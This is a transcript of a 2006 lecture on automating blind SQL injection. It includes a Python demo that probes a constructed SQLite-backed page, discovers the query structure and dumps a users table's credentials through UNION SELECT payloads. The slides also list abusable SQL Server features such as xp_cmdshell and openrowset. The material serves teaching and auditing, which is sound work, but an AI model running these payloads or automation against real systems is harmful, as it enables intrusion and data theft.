Automated Estimation and Evaluation of SQL-injection Vulnerabilities Jonas Persson, Group 30 - Language based security 2006.

Presentation transcript:

1 Automated Estimation and Evaluation of SQL-injection Vulnerabilities Jonas Persson, Group 30 - Language based security 2006

2 Contents  The impact of SQL-injection  Blindfolded SQL-injection  What has been done before  Automating the process  Results  Conclusions

3 Impact of SQL-injection (all of the following are Microsoft SQL Server features)
 sysobjects – stores info on all objects (tables, views, procedures) in the current database
 sysdatabases – stores info on all databases on the server
 xp_cmdshell – executes arbitrary operating-system commands
 bcp – writes query output to an arbitrary file
 openrowset – transfers data from/to a remote SQL Server (including one the attacker controls)
 xp_regwrite – writes arbitrary registry values
 bulk insert – loads the contents of an arbitrary file into a table

4 Blindfolded SQL-injection
 Should not rely on the contents of error messages
 The only relevant question is: did the query execute or not?
 Procedure:
   Determine errors
   Find format and query structure
   Exploit

5 What has been done before
 Automated data mining using blindfolded SQL-injection (Absinthe by Cameron Hotchkies)
 Vulnerability scanning tools with support for finding SQL-injections

6 Limitations
 Absinthe only mines data through an existing injection; it does not find the vulnerabilities
 All vulnerability scanning tools I have tested only append a single quote at the end of parameter values and report a vulnerability if the server returns a "500 – internal server error"

7 Automating the process
 Determine errors
   Appending " AND " should give an incorrect-syntax error (the query does not execute)
   Appending " AND 1=0 " should execute but return no rows, i.e. produce the application's own error or "not found" response
   Appending " AND 1=1 " should execute and leave the response unchanged
 Comparing later responses to these three tells us whether appending " AND (any sql) " executed or not

8 Automating the process
 Finding format
   Appending " -- " might comment out necessary ending parentheses
   Break out of parentheses by closing them one by one until the query executes
 More advanced formats do not require this procedure

9 Automating the process
 Finding the query structure
   How many columns does the query select? Try ordering! " ORDER BY 1 -- ", " ORDER BY 2 -- ", ... until it fails
   Which types do the selected columns have?
   Three base types: strings, ints and dates
   Append " UNION ALL SELECT null -- " (NULL matches any type, so this confirms the column count)
   Append " UNION ALL SELECT 1 -- " (executes only if the column accepts an int)
   Append " UNION ALL SELECT '1' -- " (executes only if the column accepts a string)

10 Automating the process
 Once you have found the format and structure, exploiting is easy! " UNION ALL SELECT columns FROM table -- "
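The procedure of slides 7 to 10 (determine errors, find format, find query structure, exploit), as an added example that is not part of the original presentation. The target endpoint, its products and users tables, and the id parameter are constructed for this demo and backed by an in-memory SQLite database standing in for SQL Server; because SQLite does not enforce column types across UNION, the int/string type-probing step of slide 9 is left out, and only the NULL union is used to cross-check the column count. A second endpoint with a bound parameter shows what the same probe sees when the bug is fixed.

```python
"""Blindfolded SQL-injection automation against a constructed, SQLite-backed target."""
import sqlite3

# Constructed in-memory database standing in for the target's backend.
_conn = sqlite3.connect(":memory:")
_conn.executescript("""
    CREATE TABLE products(id INTEGER, name TEXT, added TEXT);
    INSERT INTO products VALUES (1, 'lamp', '2006-01-02'), (2, 'desk', '2006-03-04');
    CREATE TABLE users(id INTEGER, login TEXT, pwd TEXT);
    INSERT INTO users VALUES (1, 'admin', 's3cret');
""")


def _render(rows):
    """The hypothetical application's page: the rows, or a 'not found' message."""
    if not rows:
        return (200, "no such product")
    return (200, "\n".join(",".join(map(str, r)) for r in rows))


def vulnerable_endpoint(pid):
    """Constructed target: concatenates the parameter into the query (the bug) and
    tells the client only whether the query ran; SQL error text never leaves the server."""
    sql = f"SELECT id, name, added FROM products WHERE (id = {pid})"
    try:
        return _render(_conn.execute(sql).fetchall())
    except sqlite3.Error:
        return (500, "internal server error")


def safe_endpoint(pid):
    """Hardened form of the same page: the parameter is bound, never concatenated."""
    sql = "SELECT id, name, added FROM products WHERE (id = ?)"
    return _render(_conn.execute(sql, (pid,)).fetchall())


def determine_errors(request, base):
    """Slide 7: learn what 'did not execute' looks like for this parameter.
    Returns the syntax-error response, or None if the parameter shows no signal."""
    original = request(base)
    syntax_err = request(base + " AND ")      # must not execute
    false_case = request(base + " AND 1=0 ")  # executes, but changes the page
    true_case = request(base + " AND 1=1 ")   # executes, page unchanged
    if syntax_err == original or false_case == original or true_case != original:
        return None
    return syntax_err


def find_format(executes, max_parens=3):
    """Slide 8: close parentheses one by one until '-- ' no longer breaks the query."""
    for n in range(max_parens + 1):
        if executes(")" * n + " AND 1=1 -- "):
            return n
    return None


def find_columns(executes, inject, max_cols=20):
    """Slide 9: ORDER BY n succeeds exactly while n <= number of selected columns."""
    n = 1
    while n <= max_cols and executes(inject(f"ORDER BY {n}")):
        n += 1
    return n - 1


def probe(request, base):
    """Run the whole procedure; if the parameter is injectable, dump the users table."""
    syntax_err = determine_errors(request, base)
    if syntax_err is None:
        return None

    def executes(payload):
        return request(base + payload) != syntax_err

    parens = find_format(executes)
    if parens is None:
        return None

    def inject(clause):
        return ")" * parens + " " + clause + " -- "

    cols = find_columns(executes, inject)
    # Cross-check the count with a NULL union (slide 9); NULL is type-neutral.
    union_ok = executes(inject("UNION ALL SELECT " + ",".join(["null"] * cols)))
    # Slide 10: with format and structure known, exploitation is one more request.
    _status, body = request(base + inject("UNION ALL SELECT id, login, pwd FROM users"))
    return {"parens": parens, "columns": cols, "union_ok": union_ok,
            "dump": body.splitlines()}


if __name__ == "__main__":
    print(probe(vulnerable_endpoint, "1"))
    print(probe(safe_endpoint, "1"))
```

The probe never reads error text: every decision is made by comparing a response with the syntax-error baseline learned in the first step, which is what makes the method work against servers that hide database errors behind a generic page. Against the bound-parameter endpoint the three baseline requests all fall through to "no such product", so the very first step reports no signal.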

11 Automating the process
 Checking the impact
   Selecting from system tables
   Running stored procedures
   Connecting to other servers through openrowset
   Reading files with bulk insert
   Options are limitless!

12 Results
 A program that
   Evaluates a parameter and returns how likely it is that the parameter is vulnerable and exploitable
   Finds format and query structure
   Estimates how vulnerable the parameter is on a scale from 1 to 10
   Reports its findings to the user, detailing the vulnerability and its impact

13 Results

14 Conclusions
 As we have just seen, it is indeed possible to automate both the search for and the exploitation of SQL-injection vulnerabilities
 The example can be extended in many different ways to create either a versatile audit tool or a powerful hacking tool
